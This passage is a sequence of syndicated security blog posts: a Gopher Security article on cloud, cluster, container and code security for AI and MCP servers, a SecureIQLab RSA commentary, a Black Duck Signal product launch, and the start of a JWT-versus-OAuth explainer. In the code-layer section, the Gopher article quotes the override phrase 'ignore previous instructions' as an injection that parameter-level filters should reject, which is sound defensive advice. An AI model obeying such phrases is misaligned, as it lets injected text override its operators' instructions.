src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-1.svg" alt="Diagram 1"></p><p>According to a <a href="https://www.ibm.com/reports/data-breach">2024 report by IBM</a>, the average cost of a breach is hitting record highs, and as ai becomes the backbone of infrastructure, these costs are only going up if we don't adapt. </p><p>Next, we'll look at how the first "C"—Cloud—is getting a massive makeover for the ai age.</p><h2>Cloud: GPU Availability and Specialized VPCs</h2><p>When we talk about the first "C"—Cloud—it’s not just about where your data sits anymore. In the ai era, the cloud layer is being redefined by the massive demand for compute. We're seeing a shift toward specialized VPCs (Virtual Private Clouds) designed specifically for model training and inference. </p><p>If you're running heavy workloads, your cloud security now involves managing GPU availability and ensuring that the specialized hardware isn't creating new holes in your perimeter. You have to worry about how your ai models are partitioned off from the rest of your corporate network.</p><ul> <li><strong>Specialized AI Infrastructure:</strong> We're moving toward dedicated clusters for llms where the networking is tuned for high-speed data transfer between nodes.</li> <li><strong>GPU-Aware Security:</strong> Your cloud provider handles the physical hardware, but you're now responsible for the security of the actual data flowing into those GPUs.</li> <li><strong>Future-Proofing with Quantum:</strong> As a side note, we also need to think about "quantum-hardened" connectivity. While it's a bit of a future problem, "harvest now, decrypt later" attacks mean we should start looking at post-quantum cryptography (PQC) for our cloud tunnels sooner than later.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-2.svg" alt="Diagram 2"></p><p>A 2024 study by Deloitte found that most organizations aren't prepared for these new infrastructure demands, which is wild considering how much data we're pumping into ai right now. </p><p>Next, we're diving into the "Cluster" layer to see how we manage these ai workloads without losing our minds.</p><h2>Cluster: Orchestration and Control Planes</h2><p>Managing a cluster used to just be about keeping the lights on, but now that we're cramming ai models into every corner of our infrastructure, things have gotten… messy. The "Cluster" layer is all about orchestration—usually kubernetes—and how the control plane manages these complex ai agents.</p><p>If your kubernetes nodes are chatting with sensitive data via mcp, you can't just slap a basic network policy on it and call it a day. You need to focus on how the control plane is authenticated. I've seen so many teams struggle to get their mcp servers running because they try to hand-code every single connection. </p><p>Honestly, it's a nightmare. That's why tools like <strong>Gopher Security</strong> are such a lifesaver. Gopher is a platform used to automate the security layer for mcp servers—it basically acts as the glue that ensures your cluster orchestration stays secure without you having to write a thousand lines of yaml.</p><ul> <li><strong>Zero-Trust Clusters:</strong> Your ai agent shouldn't just have a "golden ticket" to every database in the cluster.</li> <li><strong>Control Plane Integrity:</strong> Protecting the kubernetes api is more important than ever when it's managing models that have access to your entire data lake.</li> </ul><h2>Container: Image Security and Model Weights</h2><p>Now, let's talk about the "Container" layer specifically. This is where the actual ai runtimes live—things like Ollama or vLLM. Container security for ai is a different beast because these images are huge. You aren't just scanning a tiny linux distro; you're dealing with massive layers containing model weights and specialized libraries.</p><ul> <li><strong>Scanning Base Images:</strong> You need to be scanning those model-serving runtimes for vulnerabilities. If your base image for vLLM has a critical bug, your whole ai stack is at risk.</li> <li><strong>Managing Model Weights:</strong> Storing large model weights inside container layers can be a security nightmare. You need to ensure those weights haven't been tampered with (model poisoning) before they're loaded into memory.</li> <li><strong>Runtime Protection:</strong> Use tools that monitor what's happening inside the container. If a retail bot in a container starts trying to execute shell commands, your runtime protection should kill it instantly.</li> </ul><p>According to a 2024 report by Palo Alto Networks, nearly 80% of organizations have found high-risk roles in their cloud infrastructure, which is a terrifying thought when you realize how much power a containerized ai agent has.</p><pre><code class="language-python"># Example of using a tool to secure the connection from mcp_server import SecureServer # Gopher is the platform that automates this security layer app = SecureServer(name="Inventory-Bot") @app.tool(schema_path="./inventory_api.json") def get_stock(item_id: str): # Gopher handles the auth handshake and validation here return database.query(item_id) </code></pre><p>Next up, we're looking at the "Code" layer—because even the best cluster can't save you from buggy, insecure logic.</p><h2>Code: Protecting the Logic and Data Flow</h2><p>Writing code used to be about logic and loops, but now that we’re plugging ai into everything, your code is basically a giant open door if you aren't careful. It's one thing to have a bug in a checkout script, but it's a whole different disaster when your code lets a model hallucinate its way into your admin panel.</p><p>The "Code" layer in the 4 C's is where the rubber meets the road for mcp. If you don't have tight controls on how your apps talk to these models, you're just asking for trouble. </p><ul> <li><strong>Deep Packet Inspection for AI:</strong> You can't just trust the traffic. You need to look inside the mcp requests to see if the model is trying to do something weird.</li> <li><strong>Granular Policy Engines:</strong> I’m talking about parameter-level restrictions. If a tool is supposed to fetch a "user_id," your code should reject any request that tries to inject a system prompt like "ignore previous instructions" into that field.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-3.svg" alt="Diagram 3"></p><p>In a recent study, <strong>Snyk</strong> (2024) pointed out that insecure ai-generated code is already showing up in production environments. Whether you're in fintech or building a simple retail bot, the logic layer is your last line of defense. </p><p>Moving from these technical implementations to a broader strategy requires a "Context-First" approach. This means shifting our focus from just fixing bugs to meeting the regulatory and compliance frameworks that govern how ai handles data.</p><h2>Future-Proofing Your 4 C's Strategy</h2><p>So, you've got the 4 C's down, but how do you keep this whole ai-powered house of cards from falling over when the next big threat hits? It's really about making security part of the plumbing, not just a shiny badge you slap on at the end.</p><p>Mapping your stack to standards like SOC 2 or ISO 27001 is a massive pain, especially with mcp servers popping up everywhere. You need continuous monitoring that actually understands what an "anomaly" looks like in an ai context window.</p><ul> <li><strong>Living Audit Logs:</strong> Don't just log that a connection happened; log the <em>intent</em>. If a finance bot suddenly asks for pii it doesn't need, your system should flag that as a policy violation immediately.</li> <li><strong>Ethics by Design:</strong> Ensure your code layer filters for bias. According to <a href="https://snyk.io/reports/ai-code-security/">Snyk</a> (2024), ai-generated code often misses basic safety checks, so manual reviews are still a must for high-risk healthcare or banking apps.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-4.svg" alt="Diagram 4"></p><p>Honestly, the goal is to reach a spot where your infrastructure defends itself. If you're building for the long haul, focus on that "context-first" mindset and you'll be fine. Stay safe out there.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/automated-cryptographic-agility-frameworks-for-ai-resource-orchestration/" data-a2a-title="Automated Cryptographic Agility Frameworks for AI Resource Orchestration"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fautomated-cryptographic-agility-frameworks-for-ai-resource-orchestration%2F&amp;linkname=Automated%20Cryptographic%20Agility%20Frameworks%20for%20AI%20Resource%20Orchestration" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fautomated-cryptographic-agility-frameworks-for-ai-resource-orchestration%2F&amp;linkname=Automated%20Cryptographic%20Agility%20Frameworks%20for%20AI%20Resource%20Orchestration" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fautomated-cryptographic-agility-frameworks-for-ai-resource-orchestration%2F&amp;linkname=Automated%20Cryptographic%20Agility%20Frameworks%20for%20AI%20Resource%20Orchestration" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fautomated-cryptographic-agility-frameworks-for-ai-resource-orchestration%2F&amp;linkname=Automated%20Cryptographic%20Agility%20Frameworks%20for%20AI%20Resource%20Orchestration" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fautomated-cryptographic-agility-frameworks-for-ai-resource-orchestration%2F&amp;linkname=Automated%20Cryptographic%20Agility%20Frameworks%20for%20AI%20Resource%20Orchestration" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security&amp;#039;s Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/automated-cryptographic-agility-frameworks-ai-resource-orchestration">https://www.gopher.security/blog/automated-cryptographic-agility-frameworks-ai-resource-orchestration</a> </p>

<p>Here at RSA, the hype is on “high”, including dune buggies driving the streets wrapped in high-tech banners claiming to have solved all things AI. Even before you get downtown you are greeted at the airport with big budget AI splashed all over the walls with outsized claims.</p><p>But what is real? </p><p>We here at SecureIQLab are trying to bring some of those claims back down to earth, in the form of neutral third party tools and reports to give normal businesses and organizations a way to sort through the fluff and get to what real information you can use.</p><p>Here are a few ways to cut the clutter and get to what you can trust about AI.</p><ol class="wp-block-list"> <li><strong>Show me the failure cases, not the demo</strong> – Right now everyone’s talking about fantastic capabilities, but what happens in the first contact with adversarial attack traffic? What happened under heavy load, not just a few test prompts? How does a vendor tune their systems against false positives and false negatives? If they don’t know – that’s not a good sign.</li> <li><strong>Map claims to specific attack classes</strong> – A vendor claiming to “stop AI threats” is vague, at best. Best to ask “Which of the OWASP LLM Top 10 do you actually stop—and how do you prove it?” For example: <ol class="wp-block-list"> <li>Prompt Injection – How did you test it?</li> <li>Data exfiltration – Did you monitor, or block it?</li> <li>Model extraction – How did you measure it? </li> </ol> </li> <li><strong>Separate detection from prevention</strong> – Right now, many AI “security” tools are little more than telemetry engines. Better ask “is your tool blocking, or just monitoring”, and “how many attacks are automatically blocked”. </li> <li><strong>Ask for an independent assessment</strong> – Right now, many vendors are basically grading their own papers – and producing “surprisingly” good results. But self-testing is an awful lot like not testing, and just as likely to survive when faced with real adversarial traffic. If there’s no third-party validation, assume you’re still looking at a demo.</li> </ol><p>At RSA, AI is everywhere, but clarity is not. It’s a good time to gather information, with a healthy dose of skepticism, and ask some specific, pointed questions. Solid, tested vendors won’t just show you their successes, but also failures, where they’re learning, and how they’re evolving their products to face real-world threats.</p><p>If you’re at RSAC 2026, book a meeting with me to see our SOCx + AI validation demo or to learn more about our AI Security CyberRisk Validation Methodology v1.0–releasing this week.</p><style> .custom-btn { display:inline-block; background:#f4b400; color:#000 !important; font-weight:600; font-size:16px; padding:12px 20px; text-decoration:none; border-radius:2px; font-family:Arial, sans-serif; transition:0.3s; } .custom-btn:hover { background:#e0a800; } </style><p><a href="https://secureiqlab.com/go/rsa-live?utm_content=livedays_blog1" class="custom-btn"><br> Meet Me at RSAC 2026 »<br> </a></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/rsa-2026-ai-oozing-out-of-every-pore/" data-a2a-title="RSA 2026 – AI Oozing Out of Every Pore"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frsa-2026-ai-oozing-out-of-every-pore%2F&amp;linkname=RSA%202026%20%E2%80%93%20AI%20Oozing%20Out%20of%20Every%20Pore" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frsa-2026-ai-oozing-out-of-every-pore%2F&amp;linkname=RSA%202026%20%E2%80%93%20AI%20Oozing%20Out%20of%20Every%20Pore" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frsa-2026-ai-oozing-out-of-every-pore%2F&amp;linkname=RSA%202026%20%E2%80%93%20AI%20Oozing%20Out%20of%20Every%20Pore" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frsa-2026-ai-oozing-out-of-every-pore%2F&amp;linkname=RSA%202026%20%E2%80%93%20AI%20Oozing%20Out%20of%20Every%20Pore" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frsa-2026-ai-oozing-out-of-every-pore%2F&amp;linkname=RSA%202026%20%E2%80%93%20AI%20Oozing%20Out%20of%20Every%20Pore" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://secureiqlab.com">SecureIQ Lab</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Cameron Camp">Cameron Camp</a>. Read the original post at: <a href="https://secureiqlab.com/rsa-2026-ai-oozing-out-of-every-pore/">https://secureiqlab.com/rsa-2026-ai-oozing-out-of-every-pore/</a> </p>

<div class="col-xs-12 col-sm-9 two2575Right"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <p>AI has fundamentally changed how software is built. AI agents are now designing architectures, writing functions, and deploying features autonomously. Developers are shipping code at velocities that would have been unimaginable just a year ago. This isn’t incremental progress—it’s a complete reimagining of software development.</p> <p>This transformation comes with a critical challenge that every organization must meet: How to secure software that’s created faster than any human—or traditional security tool—can keep pace with.</p> <p>I’m proud to announce the general availability of <a href="https://www.blackduck.com/signal-ai-appsec.html">Black Duck Signal</a>^™, our answer to this challenge. It provides something the market desperately needs: A new model for application security that combines the power of AI with two decades of battle-tested security intelligence.</p> </div> </section></div> </div> <div class="text aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-top-sm vert-pad-bottom-sm "> <div class="container "> <section class="component-textcomp text-align-left "> <div class="component-text"> </div> <hr class="separator"> </section> </div> </div> </div> <div class="anchor aem-GridColumn aem-GridColumn--default--12"> <div id="1" class="component-anchor"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> </div> </div> </div> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-bottom-xs "> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <h2><span class="text-color-synopsys-purple">The security gap in AI-driven development</span></h2> <p>As agentic AI takes the driver’s seat in software creation, developers face application risk at unprecedented speed and scale. Traditional application security testing (AST) tools weren’t designed for this reality. They were designed for code that was written sequentially, intentionally, and only by humans. They scan periodically, alert cautiously, and operate out-of-band. In an agentic world, that model collapses. Agentic AI is capable of producing hundreds of changes per hour, across multiple components, APIs, and configurations. Code reviews can’t scale that mountain of code, so changes are going into repos unseen.</p> <p>Generic AI-powered security tools have emerged to address this gap, but they lack the one ingredient that enterprise security absolutely depends on: context. By context, I mean the deep understanding of an application’s components, relationships, data flows, frameworks, and runtime behavior that gives AI the grounding it needs to make accurate security decisions. Without it, AI tools face three critical limitations: hallucinations, noise, and remediation errors. They generate plausible-sounding but inaccurate findings, and they overwhelm teams with false positives and suggested theoretical fixes that fail in production environments. When you’re securing enterprise-grade software at AI scale, this is simply unacceptable.</p> </div> </section></div> </div> </div> <div class="anchor aem-GridColumn aem-GridColumn--default--12"> <div id="2" class="component-anchor"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> </div> </div> </div> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-bottom-xs "> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <h2><span class="text-color-synopsys-purple">ContextAI: Where AI meets two decades of security expertise</span></h2> <p>This is where Signal fundamentally differs from every other solution in the market. At its core, Signal is powered by ContextAI™, our purpose-built application security model containing petabytes of human-vetted security intelligence. ContextAI has something no generic AI can replicate: 20+ years of security ground truth from thousands of real-world proprietary and open source codebases.</p> <p>Think about what that means. When Signal analyzes your code, it’s not applying LLM reasoning in a vacuum. It’s augmenting AI with petabytes of context from Black Duck’s living knowledge base, meticulously curated from hundreds of thousands of commercial and open source codebases. It’s applying context from coding rule sets exercised over billions of lines of code to deterministically identify quality and security issues across more than 40 programming languages. It’s drawing on tens of thousands of BSIMM assessments, Black Duck Audits, and dynamic scans of production web applications—millions of tests across trillions of lines of real-world code.</p> <p>This isn’t theoretical knowledge generated by a language model. This is real-world intelligence gleaned from securing mission-critical software across every industry, every language, and every framework you can imagine. This context is what transforms AI from a promising technology into a production-ready security solution that enterprises can trust.</p> </div> </section></div> </div> </div> <div class="anchor aem-GridColumn aem-GridColumn--default--12"> <div id="3" class="component-anchor"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> </div> </div> </div> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-bottom-xs "> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <h2><span class="text-color-synopsys-purple">Agentic AI that reasons, validates, and acts</span></h2> <p>Signal operates differently than traditional AST tools or single-model AI solutions. Built on an agentic AI architecture, Signal deploys multiple specialized AI security agents that work together to analyze vulnerabilities, validate exploitability, prioritize risk, and recommend or apply fixes using human-like reasoning. Where other solutions stop at identifying potential issues, Signal reasons about them with the depth and nuance of experienced security professionals.</p> <p>The practical impact is transformative. Signal actively addresses severe and complex vulnerabilities, including those based on business logic errors or in languages not supported by traditional AST tools. It goes beyond simple pattern-matching by using multiple analysis techniques to accurately match artifacts with security context in real time. By combining LLM reasoning with ContextAI’s security intelligence, Signal delivers high-fidelity analysis and automated remediation that solutions built on general AI models alone can’t deliver.</p> </div> </section></div> </div> </div> <div class="anchor aem-GridColumn aem-GridColumn--default--12"> <div id="4" class="component-anchor"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> </div> </div> </div> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-bottom-xs "> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <h2><span class="text-color-synopsys-purple">Built for modern development workflows</span></h2> <p>Signal integrates directly into the agentic software development life cycle through model context protocol and APIs that support AI coding assistants, IDEs, and automated AI pipelines. It works seamlessly with GitHub Copilot, Google Gemini, Claude Code, Cursor, and other popular development tools. Signal scans code in real time as it’s written, continuously analyzing across languages, frameworks, and architectures.</p> </div> </section></div> </div> </div> <div class="anchor aem-GridColumn aem-GridColumn--default--12"> <div id="5" class="component-anchor"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> </div> </div> </div> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-bottom-xs "> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <h2><span class="text-color-synopsys-purple">Unlocking AI’s true potential through governance</span></h2> <p>AI-driven development forces organizations to confront an uncomfortable truth: The very speed that makes AI transformative can become its greatest liability without proper governance. At machine speed, even minor security defects can multiply into major risks, threatening to erode the gains that AI promises.</p> <p>Signal unlocks AI’s true potential by enabling enterprises to govern AI-generated software responsibly and at scale. It helps organizations move faster with AI while maintaining the security, compliance, and trust that enterprises and governments demand across the entire application life cycle.</p> </div> </section></div> </div> </div> <div class="anchor aem-GridColumn aem-GridColumn--default--12"> <div id="6" class="component-anchor"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> </div> </div> </div> <div class="richTextEditor aem-GridColumn aem-GridColumn--default--12"> <div class="background-component vert-pad-bottom-sm "> <div class="container "> <section class="component-rtecomp"> <div class="component-rte"> <h2><span class="text-color-synopsys-purple">The future is now</span></h2> <p>AI is no longer just accelerating development. It’s actively authoring software. The organizations that will lead in this new era are those that harness this unprecedented power with intelligence and strong governance, transforming autonomous coding into a strategic advantage while minimizing risk.</p> <p>Black Duck Signal is available now. I invite you to see how Signal combines AI with two decades of security context to eliminate noise, reduce risk, and secure your AI-powered development at the speed of innovation.<br>  </p> <p style="text-align: center;"><span class="component-button primary"><a href="https://www.blackduck.com/signal-ai-appsec/demo.html">Learn more about Signal AI</a></span><a href="https://www.blackduck.com/signal-ai-appsec/demo.html"></a></p> </div> </section></div> </div> </div> <div class="blogsDev aem-GridColumn aem-GridColumn--default--12"> <div class="container "> <section class="cmp-blogsdev"> <ul class="cmp-blogsdev__pagetags-container"> <li data-page-tag="black-duck:content-type/blog/artificial-intelligence"><a href="https://www.blackduck.com/blog/category.artificial-intelligence.html" title="Artificial Intelligence">Artificial Intelligence</a></li> <li data-page-tag="black-duck:content-type/blog/security-news-research"><a href="https://www.blackduck.com/blog/category.security-news-research.html" title="Security News &amp; Trends">Security News &amp; Trends</a></li> </ul> </section></div> </div> </div> </div><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/black-duck-signal-security-that-moves-at-the-speed-of-ai/" data-a2a-title="Black Duck Signal: Security that moves at the speed of AI"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fblack-duck-signal-security-that-moves-at-the-speed-of-ai%2F&amp;linkname=Black%20Duck%20Signal%3A%20Security%20that%20moves%20at%20the%20speed%20of%20AI" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fblack-duck-signal-security-that-moves-at-the-speed-of-ai%2F&amp;linkname=Black%20Duck%20Signal%3A%20Security%20that%20moves%20at%20the%20speed%20of%20AI" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fblack-duck-signal-security-that-moves-at-the-speed-of-ai%2F&amp;linkname=Black%20Duck%20Signal%3A%20Security%20that%20moves%20at%20the%20speed%20of%20AI" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fblack-duck-signal-security-that-moves-at-the-speed-of-ai%2F&amp;linkname=Black%20Duck%20Signal%3A%20Security%20that%20moves%20at%20the%20speed%20of%20AI" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fblack-duck-signal-security-that-moves-at-the-speed-of-ai%2F&amp;linkname=Black%20Duck%20Signal%3A%20Security%20that%20moves%20at%20the%20speed%20of%20AI" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.blackduck.com/blog.html">Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Jason Schmitt">Jason Schmitt</a>. Read the original post at: <a href="https://www.blackduck.com/blog/black-duck-signal-security-that-moves-at-the-speed-of-ai.html">https://www.blackduck.com/blog/black-duck-signal-security-that-moves-at-the-speed-of-ai.html</a> </p>

<div data-elementor-type="wp-post" data-elementor-id="56445" class="elementor elementor-56445" data-elementor-post-type="post"> <div class="elementor-element elementor-element-6f26a2cf e-flex e-con-boxed e-con e-parent" data-id="6f26a2cf" data-element_type="container" data-e-type="container"> <div class="e-con-inner"> <div class="elementor-element elementor-element-3637114d elementor-widget elementor-widget-text-editor" data-id="3637114d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">JWT and OAuth show up together in nearly every authentication system, which is why engineers often treat them as interchangeable. They are not. OAuth is an authorization framework that defines how to grant access. JWT is a token format that defines how to package and transmit claims. They solve different problems, and most production systems use both.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The confusion between them leads to real security gaps, especially in machine-to-machine communication, where workloads cannot use browser logins or MFA prompts. Understanding where JWT ends and OAuth begins is the first step toward implementing <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/7-ways-to-authenticate-workloads-to-each-other/">workload authentication</a> correctly.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">JWT vs. OAuth: What’s the Difference?</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">OAuth 2.0 governs how applications <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/mcp-oauth-2-1-pkce-and-the-future-of-ai-authorization/">obtain limited access</a> to resources without exposing credentials. It specifies multiple authorization flows for different scenarios and manages the lifecycle of access tokens: issuance, scoping, refresh and revocation. OAuth determines what a requester can access, not who they are.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The authorization code flow is designed for web applications where server-side code can securely store secrets and handle user consent. The client credentials flow is built for machine-to-machine communication where no user interaction occurs: services authenticate directly to the authorization server using their client ID and secret to receive access tokens. Token exchange (RFC 8693) enables workloads to swap one token type for another across trust boundaries, such as exchanging an AWS IAM token for an Azure access token.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">JSON Web Token (JWT) is a compact, URL-safe token format for transmitting information between parties as a signed JSON object. Every JWT contains a header declaring the signing algorithm, a payload carrying claims (issuer, subject, audience, expiration, permissions) and a cryptographic signature that proves the token has not been tampered with. Because all necessary information is embedded in the token itself, receiving services can validate JWTs locally without calling back to a central server.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The core distinction is that OAuth is a protocol defining a process, while JWT is a format defining a data structure. In practice, OAuth often issues JWTs as its access tokens, which is why the two appear together so frequently.</p> <div class="overflow-x-auto w-full px-2 mb-6"> <table class="min-w-full border-collapse text-sm leading-[1.7] whitespace-normal"> <thead class="text-left"> <tr> <th class="text-text-100 border-b-0.5 border-border-300/60 py-2 pr-4 align-top font-bold" scope="col"> </th> <th class="text-text-100 border-b-0.5 border-border-300/60 py-2 pr-4 align-top font-bold" scope="col">JWT</th> <th class="text-text-100 border-b-0.5 border-border-300/60 py-2 pr-4 align-top font-bold" scope="col">OAuth</th> </tr> </thead> <tbody> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>What it is</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">A token format (RFC 7519)</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">An authorization framework (RFC 6749)</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Primary role</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Package and transmit signed claims between parties</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Delegate and control access to protected resources</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Statefulness</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Stateless: validated locally using the signature and claims</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Stateful: requires an authorization server to issue and manage tokens</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Revocation</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Cannot be revoked before expiration without additional infrastructure</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Tokens can be revoked at the authorization server</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Scope</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Carries claims; does not define how tokens are issued or refreshed</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Defines issuance, refresh, scoping and revocation workflows</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Use alone?</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Yes, for simple signed assertions between trusted parties</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Yes, but needs a token format (often JWT) to carry access information</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Common pairing</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Used as the token format inside OAuth flows</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Issues JWTs as access tokens and uses OIDC for identity</td> </tr> </tbody> </table> </div> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">How JWT and OAuth Work Together</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">In most production systems, OAuth and JWT complement each other rather than competing. OAuth 2.0 defines the authorization flow and token lifecycle. <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/oauth-vs-oidc-difference-when-to-use/">OpenID 